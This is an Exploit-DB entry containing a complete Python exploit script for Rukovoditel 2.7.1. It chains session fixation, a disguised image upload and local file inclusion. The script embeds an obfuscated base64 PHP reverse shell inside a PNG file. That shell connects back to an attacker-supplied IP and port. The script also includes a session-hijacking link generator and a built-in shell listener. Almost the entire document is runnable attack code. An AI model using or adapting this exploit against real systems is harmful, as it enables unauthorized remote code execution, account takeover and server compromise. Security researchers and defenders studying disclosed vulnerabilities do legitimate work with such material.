Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)

EDB-ID:

48784


Author:

danyx07

Type:

webapps


Platform:

PHP

Date:

2020-09-02


#!/usr/bin/python3
# Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated) 
# Exploit Author: @_danyx07
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: Rukovoditel < 2.7
# Tested on: Debian 9 Rukovoditel 2.6.1
# CVE : CVE-2020-11819
# Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile.
#   With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell.
#   Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code. 
#   Protip: remember to check if the registration module is enabled ;)

import sys
import requests
from bs4 import BeautifulSoup
import re
import base64
import argparse
import os
from shutil import copyfile
import datetime
import hashlib
import socket
import threading
import time
import random
import uuid

__version__ = '1.0'

parser = argparse.ArgumentParser(description=
    "Post-authenticate RCE for rukovoditel, script version %s" % __version__,
                                     usage='\n  %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n  %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
         
parser.add_argument('-t', '--target', metavar='URL', type=str, required=True,
                    help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
     
parser.add_argument('-u', '--user', type=str,
                    help='Username for authentication')
     
parser.add_argument('-p', '--password', type=str,
                    help='Password for authentication')
     
parser.add_argument('-a', '--type', required=True,  type=str,
                    help='Use -a L  to generate the link and steal the session or use -a C  if you have access credentials to the web application')
     
parser.add_argument('--ip', metavar="IP_ATTACKER", required=True,  type=str,
        help='IP attacker for reverse shell!')
     
parser.add_argument('--port', metavar="PORT_ATTACKER", required=True,  type=str,
                    help='Port for reverse shell connection')
     
parser.add_argument('--proxy', metavar="PROXY",
                    help='Setup http proxy for debbugin http://127.0.0.1:8080')
     
args = parser.parse_args()
     
# Global variables 
s = requests.Session()
url = args.target
user = args.user
pwd = args.password
typeAttack = args.type
IP=args.ip
PORT=args.port
proxyDict = {"http" : args.proxy, "https" : args.proxy}
csrf_token=""
pht=None
flag_access=False
sid = uuid.uuid4().hex
     
def serverShell():
    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server_address = (IP,int(PORT))
    server.bind((server_address))
    server.listen(0)
    print("[+] Listening on %s:%s" % (IP,PORT))
    conn,addr = server.accept()
    print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1]))
    print("Type 'quit' for exit")
    server.settimeout(10)
    while True:
        cmd = input()
        if cmd == 'quit':
            print("[-] Closing connection with the shell")
            conn.close()
            server.close()
            break

        cmd = cmd + "\n"
        if len(str(cmd)) > 0:
            command = conn.send(cmd.encode('utf-8'))
            try:
                response = conn.recv(2048)
                print(response.decode('utf-8'))
            except server.timeout:
                print("Didn't receive data!")
            finally:
                server.close()
    conn.close()

def authByCookie():
    global flag_access
    global sid
    url_hijack = url+'index.php?sid='+sid
    url_in = url+"index.php?module=dashboard/"
    print("[+] Send this URL to the victim -> %s" % url_hijack)
    while True:
        if flag_access == True:
            break

def checkAccess(stop):
    global flag_access
    time.sleep(3)
    while True:
        if typeAttack == 'L':
            s.cookies.clear()
            s.cookies.set('sid',sid)
        url_login = url+'index.php?module=users/account'
        r = s.get(url_login, proxies=proxyDict)
        response = r.text
        if response.find('account_form') != -1:
            print("[+] Access granted!")
            soup = BeautifulSoup(response, 'lxml')
            csrf_token = soup.find('input')['value']
            flag_access=True
        else:
            print("[-] Waiting for access")
        if stop():
            break
        time.sleep(3)
    return 0
    
def makeAuth():
    url_login = url+'index.php?module=users/login&action=login'
    r = s.get(url_login, proxies=proxyDict)
    html = r.text
    soup = BeautifulSoup(html, 'lxml')
    csrf_token = soup.find('input')['value']
    print("[+] Getting CSRF Token %s" % csrf_token )
    auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token}
    print("[+] Trying to authenticate with username %s" % user)
    r = s.post(url_login, data=auth, proxies=proxyDict)
    response = r.text
    if response.find("login_form") != -1:
        print("[-] Authentication failed... No match for Username and/or Password!")
        return -1

def createEvilFile():
    rv = """
        /*<?php /**/
         unlink(__FILE__);
          @error_reporting(0);
          @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
          $dis=@ini_get('disable_functions');
          if(!empty($dis)){
            $dis=preg_replace('/[, ]+/', ',', $dis);
            $dis=explode(',', $dis);
            $dis=array_map('trim', $dis);
          }else{
            $dis=array();
          }
          
        $ipaddr='"""+IP+"""';
        $port="""+PORT+""";

        if(!function_exists('SsMEEaClAOR')){
          function SsMEEaClAOR($c){
            global $dis;
            
          if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
            $c=$c." 2>&1\\n";
          }
          $RhoVbBR='is_callable';
          $vaVrJ='in_array';
          
          if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){
            $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
            $o=NULL;
            while(!feof($pipes[1])){
              $o.=fread($pipes[1],1024);
            }
            @proc_close($handle);
          }else
          if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){
            $o=shell_exec($c);
          }else
          if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){
            $o=array();
            exec($c,$o);
            $o=join(chr(10),$o).chr(10);
          }else
          if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){
            $fp=popen($c,'r');
            $o=NULL;
            if(is_resource($fp)){
              while(!feof($fp)){
                $o.=fread($fp,1024);
              }
            }
            @pclose($fp);
          }else
          if($RhoVbBR('system')and!$vaVrJ('system',$dis)){
            ob_start();
            system($c);
            $o=ob_get_contents();
            ob_end_clean();
          }else
          if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){
            ob_start();
            passthru($c);
            $o=ob_get_contents();
            ob_end_clean();
          }else
          {
            $o=0;
          }
        
            return $o;
          }
        }
        $nofuncs='no exec functions';
        if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
          $s=@fsockopen("tcp://$ipaddr",$port);
          while($c=fread($s,2048)){
            $out = '';
            if(substr($c,0,3) == 'cd '){
              chdir(substr($c,3,-1));
            } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
              break;
            }else{
              $out=SsMEEaClAOR(substr($c,0,-1));
              if($out===false){
                fwrite($s,$nofuncs);
                break;
              }
            }
            fwrite($s,$out);
          }
          fclose($s);
        }else{
          $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
          @socket_connect($s,$ipaddr,$port);
          @socket_write($s,"socket_create");
          while($c=@socket_read($s,2048)){
            $out = '';
            if(substr($c,0,3) == 'cd '){
              chdir(substr($c,3,-1));
            } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
              break;
            }else{
              $out=SsMEEaClAOR(substr($c,0,-1));
              if($out===false){
                @socket_write($s,$nofuncs);
                break;
              }
            }
            @socket_write($s,$out,strlen($out));
          }
          @socket_close($s);
        }
    """
    encoded_bytes = rv.encode('ascii')
    b64_bytes = base64.b64encode(encoded_bytes);
    payload = b64_bytes.decode('ascii')
    createImage()
    copyfile("./tux.png","/tmp/evil-tux.png")
    evilF = open('/tmp/evil-tux.png','a+')
    evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>")
    evilF.close()
    print("[+] Evil file created!")

def searchFile(etime):
    cdate = etime
    for i in range(3600,52200,900):
        h1 = hashlib.sha1()
        img1 = str(cdate+i)+"_evil-tux.png"
        h1.update(img1.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h1.hexdigest())
        if r.status_code == 200:
            print(r.text)
            return h1.hexdigest()
        h2 = hashlib.sha1()
        img2 = str(cdate-i)+"_evil-tux.png"
        h2.update(img2.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h2.hexdigest())
        if r.status_code == 200:
            #print(r.text)
            return h2.hexdigest()
        i+1800
    return ""


def uploadFile():
    global pht
    print("[+] Trying to upload evil file!...")
    form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':'english.php'}
    files = {'fields[10]':open('/tmp/evil-tux.png','rb')}
    url_upload = url+'index.php?module=users/account&action=update'
    r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
    date = r.headers['Date']
    etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
    #reg = re.findall(r"([a-fA-F\d]{40})",r.text)
    reg = None
    if not reg:
        print("[-] The file name was not found in the response :(")
        fileUp = searchFile(etime)
    else:
        fileUp = reg[0]
    print("[+] Looking for the file name uploaded...")
    r = s.get(url+"/uploads/users/"+fileUp)
    if r.status_code!=200:
        print("[-] File name couldn't be found!")
        exit()
    pht="../../uploads/users/"+fileUp
    print("[+] String for path traversal is %s" % pht)

def updateProfile(oplang="english.php"):
    if oplang == "english.php":
        print("[+] Updating profile with language %s " % oplang)
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        return 0
    else:
        print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        serverShell()

def createImage():
    if os.path.exists("tux.png"):
        return
    imgb64 = "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"
    f = open("tux.png","wb")
    f.write(base64.b64decode(imgb64))	
    f.close()

def main():
    s.cookies.clear()
    stop_threads = False
    check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, ))
    check_thread.start()
    if typeAttack == "C":
        if makeAuth() == -1:
            stop_threads = True
            check_thread.join()
            print("[-] Exiting...")
            exit(0)
    elif typeAttack == "L":
        authByCookie()
    else:
        "[!] You must specify the type of attack with the -a option"
        exit()
    createEvilFile()
    uploadFile()
    updateProfile(pht)
    stop_threads = True
    check_thread.join()
    print("[+] Starting clean up...")
    updateProfile()
    os.remove("/tmp/evil-tux.png")
    print("[+] Exiting...")

if __name__ == '__main__':
    main()
    s.cookies.clear()
    """try:
        main()
        s.cookies.clear()
    except Exception as e:
       print("[\033[91m!\033[0m] Error: %s" % e)"""